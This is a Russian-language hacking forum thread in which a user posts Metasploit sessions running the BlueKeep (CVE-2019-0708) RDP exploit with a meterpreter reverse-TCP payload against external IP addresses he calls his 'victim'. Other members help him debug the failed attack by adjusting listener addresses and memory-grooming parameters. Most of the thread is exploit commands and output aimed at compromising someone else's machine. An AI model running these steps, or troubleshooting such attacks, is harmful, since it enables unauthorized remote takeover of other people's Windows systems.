HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.03.2020, 00:18
leikoz
Guest
Сообщений: n/a
Провел на форуме:
1296

Репутация: 0
По умолчанию

Проблемма с использованиемCVE-2019-0708

msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

PAYLOAD => windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1


msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 200.000.100.28

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit

[*] Exploiting target 200.000.100.28
[*] Started reverse TCP handler on 192.168.1.114:4444
[*] 200.000.100.28:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check

[+] 200.000.100.28:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 200.000.100.28:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Sending stage (206403 bytes) to 5.164.26.35 [COLOR="#ff0000"][SIZE="4"]
[*] 200.000.100.28:3389 - Surfing channels ...
[*] 200.000.100.28:3389 - Lobbing eggs ...

[-] 200.000.100.28:3389 - Exploit failed: NameError undefined local variable or method `rdp_move_mouse' for #

Может кто сталкивался, все перекопал не нашел похожей траблы.
 
Ответить с цитированием

  #2  
Старый 21.03.2020, 06:53
3TON
Guest
Сообщений: n/a
Провел на форуме:
3951

Репутация: 1
По умолчанию

Покажи вывод "options"
 
Ответить с цитированием

  #3  
Старый 21.03.2020, 14:28
leikoz
Guest
Сообщений: n/a
Провел на форуме:
1296

Репутация: 0
По умолчанию

[SIZE="1"]msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

Name Current Setting Required Description

---- --------------- -------- -----------

RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect

RDP_CLIENT_NAME ethdev no The client computer name to report during connect, UNSET = random

RDP_DOMAIN no The client domain name to report during connect

RDP_USER no The username to report during connect, UNSET = random

RHOSTS 200.100.100.100 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'

RPORT 3389 yes The target port (TCP)

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)

LHOST 192.168.1.109 yes The listen address (an interface may be specified)

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
[*] Started reverse TCP handler on 192.168.1.109:4444
[*] 200.100.100.100:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check

[+] 200.100.100.100:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 200.100.100.100:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Sending stage (206403 bytes) to [COLOR="#ff0000"]5.164.26.35
 
Ответить с цитированием

  #4  
Старый 21.03.2020, 14:36
fandor9
Guest
Сообщений: n/a
Провел на форуме:
169390

Репутация: 47
По умолчанию

[QUOTE="leikoz"]
leikoz said:

Проблемма с использованием
CVE-2019-0708[*] Sending stage (206403 bytes) to
5.164.26.35
[COLOR="#ff0000"][SIZE="4"]
 
Ответить с цитированием

  #5  
Старый 21.03.2020, 20:53
leikoz
Guest
Сообщений: n/a
Провел на форуме:
1296

Репутация: 0
По умолчанию

Цитата:
Сообщение от fandor9  
fandor9 said:

Вы порт 4444 пробрасываете на своём роутере? или как вы подключены к интернету? Я так понимаю RDP_CLIENT_IP должен быть вашим внешним адресом.
да порт проброшен, этот адресс "5.164.26.3" вообще не понятно откуда берется это не мой адресс и близко, бывают и другие, дело в том что там должен стоять ип жертвы тоесть "[*] Sending stage (206403 bytes) to 200.000.100.28" должно быть

видео правильной работы
 
Ответить с цитированием

  #6  
Старый 22.03.2020, 03:37
hibar1Xs
Guest
Сообщений: n/a
Провел на форуме:
3935

Репутация: 3
По умолчанию

Цитата:
Сообщение от leikoz  
leikoz said:

[SIZE="1"]msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

Name Current Setting Required Description

---- --------------- -------- -----------

RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect

RDP_CLIENT_NAME ethdev no The client computer name to report during connect, UNSET = random

RDP_DOMAIN no The client domain name to report during connect

RDP_USER no The username to report during connect, UNSET = random

RHOSTS 200.100.100.100 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'

RPORT 3389 yes The target port (TCP)

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)

LHOST 192.168.1.109 yes The listen address (an interface may be specified)

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
[*] Started reverse TCP handler on 192.168.1.109:4444
[*] 200.100.100.100:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check

[+] 200.100.100.100:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 200.100.100.100:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Sending stage (206403 bytes) to [COLOR="#ff0000"]5.164.26.35
LHOST Ваш внешний адрес.

LPORT Внешний порт.

Потом укажите локальный порт и адрес через ReverseListenerBindAddress и ReverseListenerBindPort.

Подробнее посмотреть: show advanced
 
Ответить с цитированием

  #7  
Старый 22.03.2020, 07:01
leikoz
Guest
Сообщений: n/a
Провел на форуме:
1296

Репутация: 0
По умолчанию

Цитата:
Сообщение от hibar1Xs  
hibar1Xs said:

LHOST
Ваш внешний адрес.
LPORT
Внешний порт.
Потом укажите локальный порт и адрес через
ReverseListenerBindAddress
и
ReverseListenerBindPort
.
Подробнее посмотреть:
show advanced
не помогло.. все тоже самое происходит, буду пробовать с другой машины
 
Ответить с цитированием

  #8  
Старый 22.03.2020, 13:40
fandor9
Guest
Сообщений: n/a
Провел на форуме:
169390

Репутация: 47
По умолчанию

Цитата:
Сообщение от leikoz  
leikoz said:

не помогло.. все тоже самое происходит, буду пробовать с другой машины
может быть у вас не подходят адреса памяти (GROOMBASE) и размер памяти (GROOMSIZE), за счёт чего сплоит читает левый адрес памяти, где стоит всё что угодно, и берёт его как адрес. Тогда естественно сплоит летит мимо и падает. Тоесть вам надо подобрать правильный адрес и размер.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ